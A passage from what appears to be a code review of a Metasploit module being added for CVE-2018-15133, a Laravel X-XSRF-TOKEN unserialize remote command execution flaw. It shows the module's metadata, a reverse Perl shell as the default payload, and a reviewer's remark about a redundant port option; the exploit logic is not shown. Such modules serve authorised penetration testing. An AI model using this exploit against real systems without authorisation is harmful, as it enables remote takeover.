modules/exploits/unix/http/laravel_token_unserialize_exec.rb

```diff
@@ -0,0 +1,230 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'PHP Laravel Framework token Unserialize Remote Command Execution',
+      'Description' => %q{
+       This module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x <= 5.6.29.
+       Remote Command Execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to
+       an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php.
+       Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY.
+       Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix.
+       In some cases the APP_KEY is leaked which allows for exploitation.
+      },
+      'DisclosureDate' => 'Aug 07 2018',
+      'Author' => [
+        'Ståle Pettersen', # Discovery
+        'aushack', # msf exploit
+      ],
+      'References' => [
+        ['URL', 'https://github.com/kozmic/laravel-poc-CVE-2018-15133'],
+        ['CVE', '2018-15133'],
+        ['URL', 'https://laravel.com/docs/5.6/upgrade#upgrade-5.6.30'],
+        ['URL', 'https://github.com/laravel/framework/pull/25121/commits/d84cf988ed5d4661a4bf1fdcb08f5073835083a0']
+      ],
+      'License' => MSF_LICENSE,
+      'Platform' => 'unix',
+      'Arch' => ['cmd'],
+      'DefaultTarget' => 0,
+      'Stance' => Msf::Exploit::Stance::Aggressive,
+      'DefaultOptions' => {
+        'PAYLOAD' => 'cmd/unix/reverse_perl',
+      },
+      'Payload' => {
+        'DisableNops' => true,
+      },
+      'Targets' => [[ 'Automatic', {} ]],
+    ))
+
+    register_options([
+        OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
+        OptString.new('APP_KEY', [ false, "The base64 encoded APP_KEY string from the .env file", ""]),
+        Opt::RPORT(80),
```

Comment:
Probably safe to remove this, as it's the default for `Msf::Exploit::Remote::HttpClient`. Ignore this comment if `rport` is being overwritten by `Msf::Exploit::Remote::Tcp`

```suggestion
        Opt::RPORT(80),
```